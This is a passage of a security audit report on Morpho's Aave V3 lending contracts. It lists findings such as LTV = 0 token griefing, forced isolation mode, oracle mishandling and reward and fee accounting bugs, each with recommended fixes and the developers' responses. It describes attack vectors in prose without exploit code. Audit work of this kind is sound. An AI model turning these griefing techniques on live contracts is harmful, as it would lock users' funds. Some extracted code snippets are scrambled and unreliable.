operation itself (like, for example, an HF check). In the attack scenario, the bad actor could simply supply an underlying that is associated with an LTV = 0 AToken and transfer it to the Morpho contract. If the victim does not own any balance of the asset, it will be set as collateral and the victim will suffer from all the side effects previously explained. While a "normal" Aave user could simply withdraw, transfer or set that asset as non-collateral, Morpho, with the current implementation, cannot do it. Because of the impossibility to remove from the Morpho wallet the "poisoned AToken", part of the Morpho mechanics will break. • Morpho's users could not be able to withdraw both collateral and "pure" supply. 6 • Morpho's users could not be able to borrow. • Morpho's users could not be able to liquidate. • Morpho's users could not be able to claim rewards via claimRewards if one of those rewards is an AToken with LTV > 0. Recommendation: There are multiple possible solutions that could be explored by Morpho. Each of the solutions has pros, cons, and possible side effects that should be carefully evaluated. One possible solution that Morpho could explore after elaborating all the pros/cons/side effects and possible prob- lems could be to allow the DAO to set the "poison asset" as non-collateral. If the asset is part of Morpho's markets, they must be sure that Morpho's Aave position remains healthy. If the asset is not part of Morpho's markets, there should be no problem regarding the health factor. A second possible solution could be to allow the DAO to withdraw/transfer the "poisoned token" if the token does not belong to an existing market (this is to prevent touching the user's assets). If the token belongs to Morpho's market, the solution is trickier and should probably fall back to the first solution without touching the user's balance in an active way. Because of how Aave behaves, it should be noted that if Morpho withdraws/transfer all the balance of the LTV = 0 asset, the attacker can repeat the griefing attack by transferring again the "poisoned asset" to Morpho that would be re-enabled as collateral by default. Because of this, probably the second solution should be avoided. It should be noted that the problems described above could exist for assets that already belong to the existing Morpho market. This scenario will be handled in a separate issue. Morpho: Fixed by P5 569 followed by P5 768. In case of emergency we'll follow the guidelines written in this notion link. At deployment we sent aTokens of all markets to the Morpho contract and disabled them as collateral on pool so that this attack cannot be performed on the current listed assets on Aave. Also, Aave is planning an upgrade that would fix this issue. Spearbit: Fixed. +5.1.3 Morpho is not correctly handling the asset price in _getAssetPrice when isInEMode == true but priceSource is addres(0) Severity: Critical Risk Context: MorphoInternal.sol#L524-L536 Description: The current implementation of _getAssetPrice returns the asset's price based on the value of isInEMode function _getAssetPrice(address underlying, IAaveOracle oracle, bool isInEMode, address priceSource) internal view returns (uint256) if (isInEMode) { uint256 eModePrice = oracle.getAssetPrice(priceSource); if (eModePrice != 0) return eModePrice; } return oracle.getAssetPrice(underlying); { } As you can see from the code, if isInEMode is equal to true they call oracle.getAssetPrice no matter what the value of priceSource that could be address(0). 7 If we look inside the AaveOracle implementation, we could assume that in the case where asset is address(0) (in this case, Morpho pass priceSource _getAssetPrice parameter) it would probably return _fallbackOra- cle.getAssetPrice(asset). In any case, the Morpho logic diverges compared to what Aave implements. On Aave, if the user is not in e-mode, the e-mode oracle is address(0) or the asset's e-mode is not equal to the user's e-mode (in case the user is in e-mode), Aave always uses the asset price of the underlying and not the one in the e-mode priceSource. The impact is that if no explicit eMode oracle has been set, Morpho might revert in price computations, breaking liquidations, collateral withdrawals, and borrows if the fallback oracle does not support the asset, or it will return the fallback oracle's price which is different from the price that Aave would use. Recommendation: Morpho should use and return the e-mode price eModePrice only when isInEMode and price- Source != address(0) Morpho: Recommendation implemented in PR 590. Spearbit: Fixed. +5.1.4 Isolated assets are treated as collateral in Morpho Severity: Critical Risk Context: aave-v3/SupplyLogic.sol#L78, aave-v3/ValidationLogic.sol#L711, aave-v3/UserConfiguration.sol#L194, PositionsManagerInternal.sol#L408 Description: Aave-v3 introduced isolation assets and isolation mode for users: "Borrowers supplying an isolated asset as collateral cannot supply other assets as collateral (though they can still supply to capture yield). Only stablecoins that have been permitted by Aave governance to be borrowable in isolation the mode can be borrowed by users utilizing isolated collateral up to a specified debt ceiling." The Morpho contract is intended not to be in isolation mode to avoid its restrictions. Supplying an isolated asset to Aave while there are already other (non-isolated) assets set as collateral will simply supply the asset to earn yield without setting it as collateral. However, Morpho will still set these isolated assets as collateral for the supplying user. Morpho users can borrow any asset against them which should not be possible: • Isolated assets are by definition riskier when used as collateral and should only allow borrowing up to a specific debt ceiling. • The borrows are not backed on Aave as the isolated asset is not treated as collateral there, lowering the Morpho Aave position's health factor and putting the system at risk of liquidation on Aave. Recommendation: The current code assumes that a supplied asset is always set as collateral on Aave whenever a supplyCollateral action with its _POOL.supplyToPool call succeeds. In addition to Morpho can end up in isolation mode which ensures that the system does not end up in isolation mode, reject isolated assets for supplyCollateral calls. Alternatively, check that the supplied asset is indeed set as collateral on Aave after the _POOL.supplyToPool(underlying, amount) call. Morpho: Addressed with PR 569. More information on edge cases and how we would handle can be found here. Spearbit: Fixed. 8 5.2 High Risk +5.2.1 Morpho's logic to handle LTV = 0 AToken diverges from the Aave logic and could decrease the user's HF/borrowing power compared to what the same user would have on Aave Severity: High Risk MorphoInternal.sol#L324, Context: PositionsManagerInternal.sol#L176-L192 PositionsManager.sol#L118, PositionsManager.sol#L209-L211, Description: The current implementation of Morpho has a specific logic to handle the scenario where Aave sets the asset's LTV to zero. We can see how Morpho is handling it in the _assetLiquidityData function function _assetLiquidityData(address underlying, Types.LiquidityVars memory vars) internal view returns (uint256 underlyingPrice, uint256 ltv, uint256 liquidationThreshold, uint256 tokenUnit) { ,! } // other function code... // If the LTV is 0 on Aave V3, the asset cannot be used as collateral to borrow upon a breaking withdraw. // In response, Morpho disables the asset as collateral and sets its liquidation threshold // to 0 and the governance should warn users to repay their debt. if (config.getLtv() == 0) return (underlyingPrice, 0, 0, tokenUnit); // other function code... The _assetLiquidityData function is used to calculate the number of assets a user can borrow and the maximum debt a user can reach before being liquidated. Those values are then used to calculate the user Health Factor. The Health Factor is used to • Calculate both if a user can be liquidated and in which percentage the collateral can be seized. • Calculate if a user can withdraw part of his/her collateral. The debt and borrowable amount are used in the Borrowing operations to know if a user is allowed to borrow the specified amount of tokens. On Aave, this situation is handled differently. First, there's a specific distinction when the liquidation threshold is equal to zero and when the Loan to Value of the asset is equal to zero. Note that Aave enforces (on the configuration setter of a reserve) that ltv must be <= of liquidationThreshold, this implies that if the LT is zero, the LTV must be zero. In the first case (liquidation threshold equal to zero) the collateral is not counted as collateral. This is the same behavior followed by Morpho, but the difference is that Morpho also follows it when the Liquidation Threshold is greater than zero. In the second case (LT > 0, LTV = 0) Aave still counts the collateral as part of the user's total collateral but does not increase the user's borrowing power (it does not increase the average LTV of the user). This influences the user's health factor (and so all the operations based on it) but not as impactfully as Morpho is doing. In conclusion, when the LTV of an asset is equal to zero, Morpho is not applying the same logic as Aave is doing, removing the collateral from the user's collateral and increasing the possibility (based on the user's health factor, user's debt, user's total collateral and all the asset's configurations on Aave) to • Deny a user's collateral withdrawal (while an Aave user could have done it). • Deny a user's borrow (while an Aave user could have done it). • Make a user liquidable (while an Aave user could have been healthy). • Increasing the possibility to allow the liquidator to seize the full collateral of the borrower (instead of 50%). 9 Recommendation: While the motivation of the Morpho approach is understandable, related to the side effects of an LTV = 0 asset in the Morpho context (see "Side effects of LTV = 0 assets: Morpho's users will not be able to withdraw (collateral and "pure" supply), borrow and liquidate" and "Morpho is vulnerable to attackers sending LTV = 0 collateral tokens, supply/supplyCollateral, borrow and liquidate operations could stop working", Morpho should evaluate all the possible alternative solutions to avoid creating a worse user experience in this edge case scenario. If there are no other possible options, Morpho should at least • Add in-depth documentation in the code about this decision and all the side effects that it could have on the user positions • Detail this behavior on their online documentation and warn the user Morpho: Addressed in PR 569. Spearbit: The PR implements a mechanism that allows the Morpho DAO to set an asset as collateral/not collateral on Morpho and Aave. This implementation is needed to handle the edge case where an asset LTV is set to zero by the Aave Governance. Without setting an LTV = 0 asset as non-collateral on Aave, some core mechanics of Morpho's protocol would break. While this PR solves this specific issue, all the side effects described in the issue still remain true. When an asset is set to isCollateral = false on Morpho or has LTV = 0 on Aave, Morpho's user's LTV and HF will be reduced because Morpho is treating that asset not as collateral anymore. The behavior has the following consequences for Morpho's users: • User could not be able to borrow anymore (because of reduced LTV). • User could not be able to withdraw anymore (because of reduced HF). • User could be liquidable (because of reduced HF). • Increase the possibility, in case of liquidation, to liquidate the whole debtor's collateral (because of reduced HF). • While the asset is not threaded as collateral anymore, it can still be sized during the liquidation process. Note that in case LTV = 0, the same user on Aave would have a different situation because on Aave, in this specific scenario, only the LTV is reduced and not the HF. The PR is lacking documentation of this behavior and the differences between Morpho and Aave in this scenario. The PR is also lacking a well documented procedure that the users should follow both before and after the LTV = 0 edge case to avoid being liquidated or incur in any of those side effects once Morpho's has set the asset as not-collateral or Aave has set the LTV to zero. Because the PR does not solve the user's side effects, Morpho should consider documenting them and provide a well-documented procedure that the users should follow for the issue's scenario. Morpho should also consider implementing some UI/UX mechanism that properly alerts users to take those actions for assets that will soon be set to isCollateral = false on Morpho or LTV = 0 on Aaave. Marked as Acknowledged. 10 +5.2.2 RewardsManager does not take in account users that have supplied collateral directly to the pool Severity: High Risk Context: RewardsManager.sol#L436 Description: Inside RewardsManager._getUserAssetBalances Morpho is calculating the amount of the supplied and borrowed balance for a specific user. In the current implementation, Morpho is ignoring the amount that the user has supplied as collateral directly into the Aave pool. As a consequence, the user will be eligible for fewer rewards or even zero in the case where he/she has supplied only collateral. Recommendation: should PHO.scaledCollateralBalance(market.underlying, user) equal When _MORPHO.scaledPoolSupplyBalance(market.underlying, user) userAssetBalances[i].balance _MOR- asset == market.aToken, be to + Morpho: Recommendation implemented in PR 587. Spearbit: Fixed. +5.2.3 Accounting issue when repaying P2P fees while having a borrow delta Severity: High Risk Context: PositionsManagerInternal.sol#L308, DeltasLib.sol#L88, MarketSideDeltaLib.sol#L63 Description: When repaying debt on Morpho, any potential borrow delta is matched first. Repaying the delta should involve both decreasing the scaledDelta as well as decreasing the scaledP2PAmount by the matched amount. [ˆ1] However, the scaledP2PAmount update is delayed until the end of the repay function. The following repayFee call then reads the un-updated market.deltas.borrow.scaledP2PAmount storage variable leading to a larger estimation of the P2P fees that can be repaid. The excess fee that is repaid will stay in the contract and not be accounted for, when it should have been used to promote borrowers, increase idle supply or demote suppliers. For example, there could now be P2P suppliers that should have been demoted but are not and in reality don't have any P2P counterparty, leaving the entire accounting system in a broken state. • Example (all values are in underlying amounts for brevity.) Imagine a borrow delta of 1000, borrow.scaledP2PTotal = 10,000 supply.scaledP2PTotal = 8,000, so the repayable fee should be (10,000 - 1000) - (8,000 - 0) = 1,000. Now a P2P borrower wants to repay 3000 debt: 1. Pool repay: no pool repay as they have no pool borrow balance. 2. Decrease p2p borrow delta: decreaseDelta is called which sets market.deltas.borrow.scaledDelta = 0 (but does not update market.deltas.borrow.scaledP2PAmount yet!) and returns matchedBorrowDelta = 1000 3. repayFee is called and it computes (10,000 - 0) - (8,000 - 1,000) = 2,000. They repay more than the actual fee. Recommendation: One way to resolve this issue is by having MarketSideDeltaLib.decreaseDelta decrease the deltas.borrow.scaledP2PTotal by the scaled repaid amount. The market.deltas.decreaseP2P call then only needs to reduce the P2P delta by vars.toSupply + idleSupplyIncrease. Consider adding tests for a scenario that has both a positive borrow delta and fees to repay. Morpho: Fixed in PR 565. Spearbit: Fixed, the scaledP2PTotal is now decreased before calling repayFee. 11 +5.2.4 Repaying with ETH does not refund excess Severity: High Risk Context: WETHGateway.sol#L67 Description: Users can repay WETH Morpho positions with ETH using the WETHGateway. The specified repay amount will be wrapped to WETH before calling the Morpho function to repay the WETH debt. However, the Morpho repay function only pulls in Math.min(_getUserBorrowBalanceFromIndexes(underlying, onBehalf, indexes), amount). If the user specified an amount larger than their debt balance, the excess will be stuck in the WETHGateway contract. This might be especially confusing for users because the standard Morpho.repay function does not have this issue and they might be used to specifying a large, round value to be sure to repay all principal and accrued debt once the transaction is mined. Recommendation: Compute the difference between the specified amount and the amount that was actually repaid, and refund it to the user. uint256 excess = msg.value - _MORPHO.repay(_WETH, msg.value, onBehalf); _unwrapAndTransferETH(excess, msg.sender); Furthermore, consider adding skim functions that can send any stuck ERC20 or native balances to a recovery account, for example, the Morpho treasury (if defined). Morpho: Fixed in PR 588 and PR 605. Spearbit: Fixed. +5.2.5 Morpho can end up in isolation mode Severity: High Risk Context: aave-v3/SupplyLogic.sol#L78, aave-v3/ValidationLogic.sol#L711, aave-v3/UserConfiguration.sol#L194 Description: Aave-v3 introduced isolation assets and isolation mode for users: "Borrowers supplying an isolated asset as collateral cannot supply other assets as collateral (though they can still supply to capture yield). Only stablecoins that have been permitted by Aave governance to be borrowable in isolation the mode can be borrowed by users utilizing isolated collateral up to a specified debt ceiling." The Morpho contract has a single Aave position for all its users and does therefore not want to end up in isolation mode due to its restrictions. The Morpho code would still treat the supplied non-isolation assets as collateral for their Morpho users, allowing them to borrow against them, but the Aave position does not treat them as collateral anymore. Furthermore, Morpho can only borrow stablecoins up to a certain debt ceiling. Morpho can be brought into isolation mode: • Up to deployment, an attacker maliciously sends an isolated asset to the address of the proxy. Aave sets assets as collateral when transferred, such that the Morpho contract already starts out in isolation mode. This can even happen before deployment by precomputing addresses or simply frontrunning the deployment. This attack also works if Morpho does not intend to create a market for the isolated asset. • Upon deployment and market creation: An attacker or unknowing user is the first to supply an asset and this asset is an isolated asset, Morpho's Aave position automatically enters isolation mode. • At any time if an isolated asset is the only collateral asset. This can happen when collateral assets are turned off on Aave, for example, by withdrawing (or liquidating) the entire balance. Recommendation: Never end up in isolation mode. Upon deployment, consider setting a non-isolation asset as collateral by using pool.supply on behalf of the contract, or simply by sending an aToken of a non-isolated asset to the contract address. Also, consider adding a function calling setReserveAsCollateral to be able to turn off collateral for isolated assets at any time. 12 Note: this function reverts if there is no balance. Morpho: Acknowledged. Spearbit: Acknowledged. 5.3 Medium Risk +5.3.1 Collateral setters for Morpho / Aave can end up in a deadlock Severity: Medium Risk Context: MorphoSetters.sol#L87-L107 Description: One can end up in a deadlock where changing the Aave pool or Morpho collateral state is not possible anymore because it can happen that Aave automatically turns the collateral asset off (for example, when withdrawing everything / getting liquidated). Imagine a collateral asset is turned on for both protocols: setAssetIsCollateralOnPool(true) setAssetIsCollateral(true) Then, a user withdraws everything on Morpho / Aave, and Aave automatically turns it off. It's off on Aave but on on Morpho. It can't be turned on for Aave anymore because: if (market.isCollateral) revert Errors.AssetIsCollateralOnMorpho(); But it also can't be turned off on Morpho anymore because of: if (!_pool.getUserConfiguration(address(this)).isUsingAsCollateral(_pool.getReserveData(underlying).id) ) { revert Errors.AssetNotCollateralOnPool(); ,! ,! } c This will be bad if new users deposit after having withdrawn the entire asset. The asset is collateral on Morpho but not on Aave, breaking an important invariant that could lead to liquidating the Morpho Aave position. Recommendation: Keep some buffer so not everything can be withdrawn, however, this doesn't completely fix the issue because liquidations allow seizing more assets than have been deposited. Consider always being able to turn an asset off on Morpho, regardless of the pool state. The check that it's also on on the pool should only be required when turning an asset on as collateral on Morpho. Morpho: • First, we plan to send aTokens for all assets to Morpho to prevent the LTV = 0 griefing attack so the only way it's possible is for Morpho to be liquidated. • This scenario is very unlikely to happen and if Morpho gets liquidated the state is desync anyway. • At the first deposit of a user or unmatching process, underlying will be deposited on the pool, resetting the asset as collateral by default even after the potential changes added by this PR on Aave. Spearbit: Acknowledged. 13 +5.3.2 First reward claim is zero for newly listed reward tokens Severity: Medium Risk Context: RewardsManager.sol#L291, RewardsManager.sol#L434, aave-v3/RewardsDistributor.sol#L261 Description: When Aave adds a new reward token for an asset, the reward index for this (asset, reward) pair starts at 0. When an update in Morpho's reward manager occurs, it initializes all rewards for the asset and would initialize this new reward token with a startingIndex of 0. 1. Time passes and emissions accumulate to all pool users, resulting in a new index assetIndex. Users who deposited on the pool through Morpho before this reward token was listed should receive their fair share of the entire emission rewards (assetIndex - 0) * oldBalance but they currently receive zero because getRewards returns early if the user's computed index is 0. 2. Also note that the external getUserAssetIndex(address user, address asset, address reward) can be inaccurate because it doesn't simulate setting the startingIndex for reward tokens that haven't been set yet. 3. A smaller issue that can happen when new reward tokens are added is that updates to the startingIndex are late, the startingIndex isn't initialized to 0 but to some asset index that accrued emissions for some time. Morpho on-pool users would lose some rewards until the first update to the asset. (They should accrue from index 0 but accrue from startingIndex.) Given frequent calls to the RewardManager that initializes all rewards for an asset, this difference should be negligible. Recommendation: The special case for a computed user index (_computeUserIndex) of 0 in getRewards seems unnecessary because initializing startingIndex is always done before calling _computeUserIndex (except for the external getUserAssetIndex function). With the way userIndex is chosen in _computeUserIndex, a userIndex of 0 means localRewardData.startingIndex is 0, i.e., the (asset, reward) pair was correctly initialized to 0 in the contract. function _getRewards(uint256 userBalance, uint256 reserveIndex, uint256 userIndex, uint256 assetUnit) internal pure returns (uint256 rewards) { - - } // If `userIndex` is 0, it means that it has not accrued reward yet. if (userIndex == 0) return 0; rewards = userBalance * (reserveIndex - userIndex); assembly { rewards := div(rewards, assetUnit) } Morpho: The suggested fix was implemented in PR 791. However, it was also suggested to update the getUserAssetIndex getter, which does not take into account a potential starting index != 0. I disagree with this, because exposing a virtual starting index update is inaccurate too: it's not guaranteed that the starting index of a reward asset already listed but not tracked by Morpho would be updated in the same block as the query A first version of such a change was drafted in PR 795 but I don't think it's more accurate, so I'd rather be in favor of keeping the current version of the RewardsManager, acknowledging that the user index exposed through the getter may just not reflect a potential starting index update happening in the same block Spearbit: Marked as fixed by PR 791. It would be more accurate (it would even be perfectly accurate from a third-party smart contract's POV calling it) but agree that this is an edge case that shouldn't happen often and it's unclear what this view function is even used for and if it needs to be fully accurate. The gain might not be worth the more complex code flow that is required for the fix. Documenting this limitation for third parties might be enough. 14 +5.3.3 Disable creating markets for siloed assets Severity: Medium Risk Context: aave-v3/UserConfiguration.sol#L214 Description: Aave-v3 introduced siloed-borrow assets and siloed-borrow mode for users "This feature allow assets with potentially manipulatable oracles (for example illiquid Uni V3 pairs) to be listed on Aave as single borrow asset i.e. if user borrows siloed asset, they cannot borrow any other asset. This helps mitigating the risk associated with such assets from impacting the overall solvency of the protocol." - Aave Docs The Morpho contract should not be in siloed-borrowing mode to avoid its restrictions on borrowing any other listed assets, especially as borrowing on the pool might be required for withdrawals. If a market for the siloed asset is created at deployment, users might borrow the siloed asset and break borrowing any of the other assets. Recommendation: There are two possible ways of handling siloed assets: • Disabling market creations Disallow creating markets for siloed assets as they shouldn't be borrowed on Morpho. Using them as collateral is also useless as they will likely have an LT/LTV of 0 on Aave. "A user can supply Siloed Asset just like any other asset using supply() method in pool.sol, though, the asset will not be enabled to use as collateral i.e. supplied amount will not add to the total collateral balance of the user." - Aave Docs The Aave docs are misleading as supplying the siloed assets does indeed enable them as collateral and there are no further restrictions on a siloed asset's LT/LTV. However, as this asset class is intended for assets with "potentially manipulatable oracles", using them as collateral should be disabled on Morpho. • Deploying a custom Morpho pool Alternatively, if there is high demand for users to borrow this asset, Morpho can deploy a new set of contracts, similar to what is being done for the efficiency mode. The only suppliable and borrowable asset should be the siloed asset, all other markets should only allow supplying and withdrawing as collateral. Morpho: Fixed in PR 633. Spearbit: Fixed. The _createMarket function now reverts when listing siloed assets. Setting an asset as siloed borrowing while it is already listed is unlikely to occur and even if it occurs there are likely already other borrow positions on Morpho and borrowing the siloed asset would fail. +5.3.4 A high value of _defaultIterations could make the withdrawal and repay operations revert because of OOG Severity: Medium Risk Context: PositionsManager.sol#L146-L147, PositionsManager.sol#L176-L178, MatchingEngine.sol#L128-L158 Description: When the user executes some actions, he/she can specify their own maxIterations parameter. The user maxIterations parameter is directly used in supplyLogic and borrowLogic. In the withdrawLogic Morpho is recalculating the maxIterations to be used internally as Math.max(_default- Iterations.withdraw, maxIterations) and in repayLogic is directly using _defaultIterations.repay as the max number of iterations. This parameter is used as the maximum number of iterations that the matching engine can do to match suppli- ers/borrowers during promotion/demotion operations. 15 function _promoteOrDemote( LogarithmicBuckets.Buckets storage poolBuckets, LogarithmicBuckets.Buckets storage p2pBuckets, Types.MatchingEngineVars memory vars ) internal returns (uint256 processed, uint256 iterationsDone) { if (vars.maxIterations == 0) return (0, 0); uint256 remaining = vars.amount; // matching engine code... for (; iterationsDone < vars.maxIterations && remaining != 0; ++iterationsDone) { // matching engine code (onPool, inP2P, remaining) = vars.step(...); // matching engine code... } // matching engine code... } As you can see, the iteration keeps going on until the matching engine has matched enough balance or the iterations have reached the maximum number of iterations. If the matching engine cannot match enough balance, it could revert because of OOG if vars.maxIterations is a high value. For the supply or borrow operations, the user is responsible for the specified number of iterations that might be done during the matching process, in that case, if the operations revert because of OGG, it's not an issue per se. The problem arises for withdraw and replay operations where Morpho is forcing the number of operations and could make all those transactions always revert in case the matching engine does not match enough balance in time. Keep in mind that even if the transaction does not revert during the _promoteOrDemote logic, it could revert during the following operations just because the _promoteOrDemote has consumed enough gas to make the following operations to use the remaining gas. Recommendation: Consider stress testing the correct value to be used for _defaultIterations.repay and _defaultIterations.withdraw to prevent those operations to revert because of OOG. Morpho: We're conducting studies on the matching efficiency given a max iterations as well as the gas consumed. This study should give us the appropriate max iterations that we should set. Spearbit: Acknowledged. +5.3.5 Morpho should check that the _positionsManager used has the same _E_MODE_CATEGORY_ID and _- ADDRESSES_PROVIDER values used by the Morpho contract itself Severity: Medium Risk Context: Morpho.sol#L48, MorphoSetters.sol#L59 Description: Because _E_MODE_CATEGORY_ID and _ADDRESSES_PROVIDER are immutable variables and because Morpho is calling the PositionsManager in a delegatecall context, it's fundamental that both Morpho and Posi- tionsManager have been initialized with the same _E_MODE_CATEGORY_ID and _ADDRESSES_PROVIDER values. Morpho should also check the value of the PositionsManager._E_MODE_CATEGORY_ID and PositionsManager._- ADDRESSES_PROVIDER in both the setPositionsManager and initialize function. Recommendation: Implement in both the setPositionsManager and initialize function a check that reverts if the value inside _E_MODE_CATEGORY_ID and _ADDRESSES_PROVIDER Morpho and PositionsManager are not equal. 16 Note that Morpho has to create a public getter for those immutable values because they are declared as internal. Morpho: We decided for putting variables in storage. We know it's not ideal in terms of gas but we prefer to do so for safety considerations. Spearbit: The Morpho team has decided to implement the recommendation by changing the _ADDRESSES_- PROVIDER, _POOL, and _E_MODE_CATEGORY_ID variables from immutable to storage. By doing that, Morpho contract will not rely on the immutable values stored in the PositionManager when called via delegatecall but will instead use the storage value of the Morpho's contract. The implementation has been done in PR 597. Two additional considerations to be noted after the PR changes: • Morpho has removed the event Events.EModeSet that was emitted during the Morpho.initialize function. They are now relying on the Aave side event emission. They should remember to update their current monitoring system to switch to the new behavior. • RewardsManager constructor does not include the _pool in the list of user's inputs and relies on the values that come from IMorpho(morpho).pool(). With the new behavior of the PR the Morpho contract could have been deployed but not initialized yet, in that case IMorpho(morpho).pool() would return address(0). Morpho should consider adding this additional check inside the constructor. +5.3.6 In _authorizeLiquidate, when healthFactor is equal to Constants.DEFAULT_LIQUIDATION_THRESHOLD Morpho is wrongly setting close factor to DEFAULT_CLOSE_FACTOR Severity: Medium Risk Context: PositionsManagerInternal.sol#L181-L190 Description: When the borrower's healthFactor is equal to Constants.MIN_LIQUIDATION_THRESHOLD Morpho is returning the wrong value for the closeFactor allowing only liquidate 50% of the collateral instead of the whole amount. When the healthFactor is lower or equal to the Constants.MIN_LIQUIDATION_THRESHOLD Morpho should return Constants.MAX_CLOSE_FACTOR following the same logic applied by Aave. Note that the user cannot be liquidated even if healthFactor == MIN_LIQUIDATION_THRESHOLD if the priceOr- acleSentinel is set and IPriceOracleSentinel(params.priceOracleSentinel).isLiquidationAllowed() == false. See how Aave performs the check inside validateLiquidationCall. Recommendation: Consider decoupling the logic that checks if a user can be liquidated and the logic that cal- culates the correct close factor to be used for the liquidation. After doing that, apply the correct fixes to follow the same behavior of Aave to determine the close factor. Morpho: Recommendation implemented in PR 571. Spearbit: Fixed. +5.3.7 _authorizeBorrow does not check if the Aave price oracle sentinel allows the borrowing operation Severity: Medium Risk Context: PositionsManagerInternal.sol#L106-L126 Description: Inside the Aave validation logic for the borrow operation, there's an additional check that prevents the user from performing the operation if it has been not allowed inside the priceOracleSentinel require( params.priceOracleSentinel == address(0) || IPriceOracleSentinel(params.priceOracleSentinel).isBorrowAllowed(), Errors.PRICE_ORACLE_SENTINEL_CHECK_FAILED ); 17 Morpho should implement the same check. If for any reason the borrow operation has been disabled on Aave, it should also be disabled on Morpho itself. While the transaction would fail in case Morpho's user would need to perform the borrow on the pool, there could be cases where the user is completely matched in P2P. In those cases, the user would have performed a borrow even if the borrow operation was not allowed on the underlying Aave pool. Recommendation: tinel(priceOracleSentinel).isBorrowAllowed() == false. the priceOracleSentinel check, Implement reverting in case IPriceOracleSen- Morpho: The recommendation has been implemented in PR 599. Spearbit: Fixed. 5.4 Low Risk +5.4.1 _updateInDS does not "bubble up" the updated values of onPool and inP2P Severity: Low Risk Context: MorphoInternal.sol#L352-L353, MorphoInternal.sol#L410 Description: The _updateInDS function takes as input uint256 onPool and uint256 inP2P that are passed not as reference, but as pure values. function _updateInDS( address poolToken, address user, LogarithmicBuckets.Buckets storage poolBuckets, LogarithmicBuckets.Buckets storage p2pBuckets, uint256 onPool, uint256 inP2P, bool demoting ) internal { if (onPool <= Constants.DUST_THRESHOLD) onPool = 0; if (inP2P <= Constants.DUST_THRESHOLD) inP2P = 0; // ... other logic of the function } Those values, if lower or equal to Constants.DUST_THRESHOLD will be set to 0. The issue is that the updated version of onPool and inP2P is never bubbled up to the original caller that will later use those values that could have been changed by the _updateInDS logic. For example, the _updateBorrowerInDS function call _updateInDS and relies on the value of onPool and inP2P to understand if the user should be removed or added to the list of borrowers. function _updateBorrowerInDS(address underlying, address user, uint256 onPool, uint256 inP2P, bool ,! demoting) internal { _updateInDS( _market[underlying].variableDebtToken, user, _marketBalances[underlying].poolBorrowers, _marketBalances[underlying].p2pBorrowers, onPool, inP2P, demoting ); if (onPool == 0 && inP2P == 0) _userBorrows[user].remove(underlying); else _userBorrows[user].add(underlying); } 18 Let's assume that inP2P and onPool passed as _updateBorrowerInDS inputs were equal to 1 (the value of DUST_- THRESHOLD). In this case, _updateInDS would update those values to zero because 1 <= DUST_THRESHOLD and would remove the user from both the poolBucket and p2pBuckets of the underlying. When then the function returns in the _updateBorrowerInDS context, the same user would not remove the under- lying from his/her _userBorrows list of assets because the updated values of onPool and inP2P have not been bubbled up by the _updateInDS function. The same conclusion could be made for all the "root" level codes that rely on the onPool and inP2P values that could not have been updated with the new 0 value set by _updateInDS. Recommendation: Consider "bubbling up" the updated value of both onPool and inP2P variables from _up- dateInDS to be able to use that updated values also in the "root" level of the code. Morpho: Recommendation implemented in PR 626. Spearbit: Fixed. +5.4.2 There is no guarantee that the _rewardsManager is set when calling claimRewards Severity: Low Risk Context: Morpho.sol#L268 Description: Since the _rewardsManager address is set using a setter function in Morpho only and not in the MorphoStorage.sol constructor there is no guarantee that the _rewardsManager is not the default address(0) value. This could cause failures when calling claimRewards if Morpho forgets to set the _rewardsManager. Recommendation: When calling claimRewards there should be a check that the rewardsManager is not ad- dress(0). Morpho: Fixed in PR 658. Spearbit: Fixed. +5.4.3 Its Impossible to set _isClaimRewardsPaused Severity: Low Risk Context: Morpho.sol#L266 Description: The claimRewards function checks the isClaimRewardsPaused boolean value and reverts if it is true. Currently, there is no setter function in the code base that sets the _isClaimRewardsPaused boolean so it is impossible to change. Recommendation: _isClaimRewarsPaused value in storage. Add a setter function with the onlyOwner modifier that is able to set the Morpho: Fixed in PR 567. Spearbit: Fixed. 19 +5.4.4 User rewards can be claimed to treasury by DAO Severity: Low Risk Context: Morpho.sol#L269, MorphoInternal.sol#L112 Description: When a user claims rewards, the rewards for the entire Morpho contract position on Aave are claimed. The excess rewards remain in the Morpho contract for until all users claimed their rewards. These rewards are not tracked and can be withdrawn by the DAO through a claimToTreasury call. Recommendation: Consider tracking the reward balance or pay attention when claiming fees to the treasury by setting the amounts parameter only to the accrued fees. Morpho: Yes, I don't think we'll add more logic for that since it would add lots of logic in the claimToTreasury function. Spearbit: Acknowledged. 5.5 Gas Optimization +5.5.1 decreaseDelta lib function should return early if amount == 0 Severity: Gas Optimization Context: MarketSideDeltaLib.sol#L55 Description: The passed in amount should be checked for a zero value, and in that condition, return early from the function. The way it currently is unnecessarily consumes more gas, and emits change events that for values that don't end up changing (newScaledDelta). Checking for amount == 0 is already being done in the increaseDelta function. Recommendation: Add a check if (amount == 0) return at the top of the decreaseDelta function. Morpho: Fixed in PR 600. Spearbit: Fixed. +5.5.2 Smaller gas optimizations Severity: Gas Optimization Context: See below Description: There are several small expressions that can be further gas optimized. Recommendation: Consider changing these: • MarketLib.sol#L219: The subtraction can be unchecked because of the if in the previous line. • MarketLib.sol#244: An unchecked subtraction can be used instead of zeroFloorSub because of matchedI- dle = Math.min(idleSupply, amount) being at most idleSupply. • MorphoInternal.sol#L294: Consider using a less gas intensive function that just retrieves underlyingPrice and tokenUnit without having to execute the rest of the _assetLiquidityData that is not useful in this function's context. That function could then be called internally by _assetLiquidityData and enhanced with the additional values needed. • MarketLib.sol#L209: consider postponing the mul operation after the check on re- serve.configuration.getSupplyCap() == 0 value Morpho: Fixed in 654. Spearbit: Fixed. 20 +5.5.3 Gas: Optimize LogarithmicBuckets.getMatch Severity: Gas Optimization Context: LogarithmicBuckets.sol#L72 Description: The getMatch function of the logarithmic bucket first checks for a bucket that is the next higher bucket If no higher bucket is found it searches for a bucket that is the than the bucket the provided value would be in. highest bucket that "is in both bucketsMask and lowerMask." However, we already know that any bucket we can now find will be in lowerMask as lowerMask is the mask corresponding to all buckets less than or equal to value's bucket. Instead, we can just directly look for the highest bucket in bucketsMask. Recommendation: Remove the lowerMask check and just return the highest bucket in the second step: function getMatch(Buckets storage _buckets, uint256 _value) internal view returns (address) { uint256 bucketsMask = _buckets.bucketsMask; if (bucketsMask == 0) return address(0); uint256 lowerMask = setLowerBits(_value); uint256 next = nextBucket(lowerMask, bucketsMask); if (next != 0) return _buckets.buckets[next].getHead(); uint256 prev = highestBucket(bucketsMask); return _buckets.buckets[prev].getHead(); } function highestBucket(uint256 bucketsMask) internal pure returns (uint256) { uint256 lowerBucketsMask = setLowerBits(bucketsMask); return lowerBucketsMask ^ (lowerBucketsMask >> 1); } 